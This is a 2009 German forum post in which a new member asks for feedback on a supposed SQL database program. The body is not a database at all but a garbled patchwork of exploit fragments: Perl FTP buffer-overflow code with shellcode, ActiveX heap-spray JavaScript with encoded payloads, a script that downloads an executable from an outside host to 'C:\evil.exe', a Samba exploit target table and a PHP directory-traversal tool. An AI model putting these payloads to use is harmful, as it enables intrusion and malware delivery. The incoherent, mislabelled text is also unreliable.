Zur Boardunity Forenstartseite
  #1  
Alt 04.09.2009, 13:41
neues Mitglied
 
Registriert seit: 09.2009
Beiträge: 1

Bitte eine Beurteilung


Wollte euch nun mal fragen, wie weit ihr meinen Programm hier beurteilen würdet.
Brauche bitte Feedbacks.

Danke


p.s

Sollte eine SQL Datenbank werden.

# EAX 010922E0
# ECX 0275FC14
# EDX 88776655
# EBX 00000028
# ESP 0275F688
# EBP 0275F81C
# ESI 00F90000
# EDI 00F90378
# EIP 77FC9906 ntdll.77FC9906
$ diff src/ctrigger.cpp src/ctrigger.cpp.new
9a10
> #include <stdio.h>
19a21,33
> void strip( char * str, char c )
> {
> char * p1 = str;
> while ( *p1++ )
> if( *p1 == c )
> {
> char * p2 = p1;
> while( *p2 && *p2 == c ) { ++p2; }
> if(*p2) { *p1 = *p2; *p2 = c; }
> else { *p1 = '\0'; break; }
> }
> }

# Instructions look like:
#
# 77FC98F4 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8]
# 77FC98F7 898D 38FFFFFF MOV DWORD PTR SS:[EBP-C8],ECX
# 77FC98FD 8B50 0C MOV EDX,DWORD PTR DS:[EAX+C]
# 77FC9900 8995 34FFFFFF MOV DWORD PTR SS:[EBP-CC],EDX
# 77FC9906 890A MOV DWORD PTR DS:[EDX],ECX
# 77FC9908 8951 04 MOV DWORD PTR DS:[ECX+4],EDX
$host = $ARGV[0];
$username = $ARGV[1];
$password = $ARGV[2];
$port = 21;
$list = "\x4c\x49\x53\x54\x20\x2a";
$padding = "\x41" x 272;
$sock = new IO::Socket::INET
(
PeerAddr=> "$host",
PeerPort=> "$port",
Proto => 'tcp'
);
die "Connection failed: $!\n\n" unless $sock;
$user_string = "user $username\r\n";
$pass_string = "pass $password\r\n";
$port_string = "PORT 10,0,0,1,154,119\r\n"; # Source host doesn't matter
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\x10".
"\x92\xe9\xd3\x83\xeb\xfc\xe2\xf4\xec\xf8\x02\x9e\ xf8\x6b\x16\x2c".
"\xef\xf2\x62\xbf\x34\xb6\x62\x96\x2c\x19\x95\xd6\ x68\x93\x06\x58".
"\x5f\x8a\x62\x8c\x30\x93\x02\x9a\x9b\xa6\x62\xd2\ xfe\xa3\x29\x4a".
"\xbc\x16\x29\xa7\x17\x53\x23\xde\x11\x50\x02\x27\ x2b\xc6\xcd\xfb".
if ($ARGV[3] == '1')
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
elsif ($ARGV[3] == '2')
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
else
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
print "\n[=] Connected.\n";
sleep 1;
print "[=] Sending $user_string";
$sock->send($user_string);
sleep 1;
id=hsmx classid="clsid:{E3462D53-47A6-11D8-8EF6-DAE89272743C
if (strlen($ora_osb_bgcookie) > 0 && $button == "Logout")
{
// Turn DEBUG_EXEC to off
$tmp = $DEBUG_EXEC;
$DEBUG_EXEC = "no";
if (strncmp($msg[0], "Error:", 6))
{
// Set the cookie up.
setcookie("ora_osb_bgcookie", "");
setcookie("ora_osb_lcookie", "");
$ora_osb_bgcookie = "";
}
$hostname = $_POST['hostname'];
$file = $_POST['file'];
$port = $_POST['port'];

if (isset($_POST['check_ver']))
{
echo '<pre>'.check_ver($hostname, 'ver', $port);
if (isset($_POST['parampampam']))
{
echo '<textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>'.check_ver($hostname, 'help /../'.$file."\0", $port).'</textarea>';
html();

}
}
try{
var obj = document.getElementById('kupa');
var rem = "http://www.adalex.pl/motyl/motyl-radio.exe";
var loc = "C:\evil.exe";
obj.Save("C:\owerwrite.ini");
obj.HttpDownloadFile(rem,loc);
}
alias unbanallx {
mode %chan +b
if ($ibl(%chan,0)) {
if (%chan ischan) {
if ($me isop %chan) || ($me ishop %chan) {
;mode %chan +b
var %x $ibl(%chan,0)
var %y 0
while (%y <= %x) {
var %banlist = $(%banlist,$ibl(%chan,%y))
inc %y
}
mode %chan $+(-,$str(b,$ibl(%chan,0))) %banlist
}
else { echo -a ur not op in %chan }
}
else { echo -a ur not on %chan }
}
}
define VERSN 25
struct versions vers[VERSN] =
{
{"Debian 3.1 r0 X restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0 X",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0a X 1st",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0a noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0a noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r1 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r1 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r2 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r2 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r3 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r3 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r4 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r4 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r5 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r5 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r6a noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r6a noX",0x0827c000,0x0837f000,30*1024},
{"Slackware 10.0 restart",0x0827c000,0x0837f000,30*1024},
{"Slackware 10.0",0x0827c000,0x0837f000,30*1024},
{"Mandrake 10.1 noX",0x80380000,0x8045b000,30*1024},
{"Mandrake 10.1 X Kde",0x80380000,0x8045b000,30*1024},
{"Samba 3.0.x DEBUG",0x80380000,0x8045b000,30*1024}
};
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41% 30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44% 42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30% 41%44%41") & _
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c% 56%4b%4e") & _
unescape("%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42% 56%4b%48") & _
unescape("%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b% 58%4e%37") & _
unescape("%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a% 51%4b%58") & _
unescape("%4f%35%42%52%41%50%4b%4e%49%54%4b%48%46% 53%4b%48") & _
unescape("%41%50%50%4e%41%33%42%4c%49%59%4e%4a%46% 38%42%4c") & _
unescape("%46%37%47%50%41%4c%4c%4c%4d%30%41%30%44% 4c%4b%4e") & _
unescape("%46%4f%4b%53%46%55%46%42%4a%52%45%57%45% 4e%4b%58") & _
unescape("%4f%35%46%32%41%30%4b%4e%48%56%4b%58%4e% 30%4b%44") & _
unescape("%4b%58%4f%55%4e%51%41%50%4b%4e%43%50%4e% 32%4b%48") & _
unescape("%49%38%4e%56%46%42%4e%31%41%46%43%4c%41% 53%4b%4d") & _
unescape("%46%36%4b%58%43%54%42%43%4b%48%42%44%4e% 50%4b%58") & _
unescape("%42%47%4e%51%4d%4a%4b%38%42%54%4a%30%50% 35%4a%56") & _
unescape("%50%48%50%54%50%30%4e%4e%42%55%4f%4f%48% 4d%48%46") & _
unescape("%43%35%48%56%4a%36%43%33%44%53%4a%46%47% 47%43%37") & _
unescape("%44%43%4f%45%46%55%4f%4f%42%4d%4a%46%4b% 4c%4d%4e") & _
unescape("%4e%4f%4b%43%42%55%4f%4f%48%4d%4f%35%49% 48%45%4e") & _
unescape("%48%56%41%38%4d%4e%4a%30%44%50%45%45%4c% 36%44%50") & _
unescape("%4f%4f%42%4d%4a%46%49%4d%49%50%45%4f%4d% 4a%47%55") & _
unescape("%4f%4f%48%4d%43%55%43%35%43%35%43%55%43% 45%43%54") & _
unescape("%43%55%43%54%43%45%4f%4f%42%4d%48%56%4a% 56%41%41") & _
unescape("%4e%45%48%46%43%55%49%48%41%4e%45%39%4a% 36%46%4a") & _
unescape("%4c%31%42%37%47%4c%47%55%4f%4f%48%4d%4c% 46%42%41") & _
unescape("%41%55%45%35%4f%4f%42%4d%4a%46%46%4a%4d% 4a%50%32") & _
unescape("%49%4e%47%35%4f%4f%48%4d%43%55%45%55%4f% 4f%42%4d") & _
unescape("%4a%36%45%4e%49%34%48%48%49%54%47%45%4f% 4f%48%4d") & _
unescape("%42%35%46%35%46%55%45%45%4f%4f%42%4d%43% 39%4a%46") & _
unescape("%47%4e%49%37%48%4c%49%57%47%35%4f%4f%48% 4d%45%45") & _
unescape("%4f%4f%42%4d%48%56%4c%36%46%56%48%56%4a% 46%43%46") & _
unescape("%4d%56%49%38%45%4e%4c%56%42%45%49%35%49% 42%4e%4c") & _
unescape("%49%38%47%4e%4c%46%46%54%49%38%44%4e%41% 33%42%4c") & _
unescape("%43%4f%4c%4a%50%4f%44%54%4d%32%50%4f%44% 44%4e%32") & _
unescape("%43%49%4d%58%4c%57%4a%53%4b%4a%4b%4a%4b% 4a%4a%46") & _
unescape("%44%57%50%4f%43%4b%48%41%4f%4f%45%57%46% 44%4f%4f") & _
unescape("%48%4d%4b%55%47%55%44%55%41%45%41%45%41% 45%4c%56") & _
unescape("%41%30%41%45%41%35%45%45%41%45%4f%4f%42% 4d%4a%46") & _
unescape("%4d%4a%49%4d%45%30%50%4c%43%45%4f%4f%48% 4d%4c%36") & _
unescape("%4f%4f%4f%4f%47%43%4f%4f%42%4d%4b%38%47% 35%4e%4f") & _
unescape("%43%38%46%4c%46%46%4f%4f%48%4d%44%55%4f% 4f%42%4d") & _
unescape("%4a%46%42%4f%4c%58%46%30%4f%45%43%35%4f% 4f%48%4d") & _
unescape("%4f%4f%42%4d%5a")
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\ x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\ x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\ x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\ x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\ x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\ x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\ x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\ x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\ x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\ x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\ x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\ x4e\x50\x4b\x44".
my $overflow = "\x42" x 158;
my $overflow2 = "\x42" x 4;
my $overflow3 = "\x43" x 430;
my $overflow4len = 977 - ((length($shellhunter) - 7)); #very important calculation
my $overflow4 = "\x44" x $overflow4len
my $sled = "\x42" x 12;
my $sled2 = "\x41" x 24;
my $eip2 = "\x37\x55\x03\x10"; #10035537 call ecx, this won't be used
my $eip1 = "\x30\x4f\x01\x10"; #10014F30 call esi, this will be used.
my $heapaddr = "\x50\x0e\x08\x10"; #valid char for buffer, heap address
my $lookout = "\x37\x65\x41\x45" x 40; # 45446537 look out values <-
my $lookout2 = "\x37\x65\x41\x45\x41" x 4; # 45446537 <-
my $lookout3 = "\x37\x65\x41\x45\x41\x41" x 4; # 45446537 <-
my $lookout4 = "\x37\x65\x41\x45\x41\x41\x41" x 4; # 45446537 <-
my $additionaddr = "\x35\x65\x41\x45"; #used for an addition in the shellhunter (+2)
my $nopsled = "\x90\x90\x90\x90\x90\x90";
my $jmp = "\x75\x0c";
"%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff% u13cf%u01ac" + ' . "\n" .
' "%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb% u0c8b%u8b4b" + ' . "\n" .
' "%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031% u8b64%u3040" + ' . "\n" .
var sSlide = unescape("%u9090%u9090");
var heapSA = 0x0c0c0c0c;
function tryMe()
{
var buffSize = 8000;
var x = unescape("%0c%0c%0c%0c");
while (x.length<buffSize) x += x;
x = x.substring(0,buffSize);
boom.SetID(x);
}
}
var heapBS = 0x400000;
var sizeHDM = 0x5;
var PLSize = (sCode.length * 2);
var sSlideSize = heapBS - (PLSize + sizeHDM);
var heapBlocks = (heapSA+heapBS)/heapBS;
var memory = new Array();
sSlide = getsSlide(sSlide,sSlideSize);
for (i=0;i<heapBlocks;i++)
{
do {
spray += spray;
} while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++)
memory[i] = spray + shellcode;
"\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\ x81\x76\x0e\xaf".
"\x4f\xb9\xec\x83\xee\xfc\xe2\xf4\x53\xa7\xfd\xec\ xaf\x4f\x32\xa9".
"\x93\xc4\xc5\xe9\xd7\x4e\x56\x67\xe0\x57\x32\xb3\ x8f\x4e\x52\xa5".
"\x24\x7b\x32\xed\x41\x7e\x79\x75\x03\xcb\x79\x98\ xa8\x8e\x73\xe1".
"\xae\x8d\x52\x18\x94\x1b\x9d\xe8\xda\xaa\x32\xb3\ x8b\x4e\x52\x8a".
my $p1="\x00\x01";
my $p2="\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";

my $ret = "\x5d\x10\x40"; #0040105D -> SkD's Tricks
my $nopsled = "\x90" x 10;
my $len = (274 - length($shellcode));

if($len < 0) {
print "[x] Your shellcode is too big! Find another way \n";
exit(0);
}
"%u652E%u6578%u9000");
var sSlide = unescape("%u9090%u9090");
var heapSA = 0x0c0c0c0c;
function tryMe()
{
var buffSize = 3000;
var x = unescape("%0c%0c%0c%0c");
while (x.length<buffSize) x += x;
x = x.substring(0,buffSize);
boom.CreateStore(x, 1);
}
}
var heapBS = 0x400000;
var sizeHDM = 0x5;
var PLSize = (sCode.length * 2);
var sSlideSize = heapBS - (PLSize + sizeHDM);
var heapBlocks = (heapSA+heapBS)/heapBS;
var memory = new Array();
sSlide = getsSlide(sSlide,sSlideSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = sSlide + sCode;
}
# grep allow_exec /etc/verlihub/dbconfig
allow_exec = 1
or
# grep allow_exec $HOME/.verlihub/dbconfig
allow_exec = 1
Antwort


Stichworte
-

Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.
Gehe zu






1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25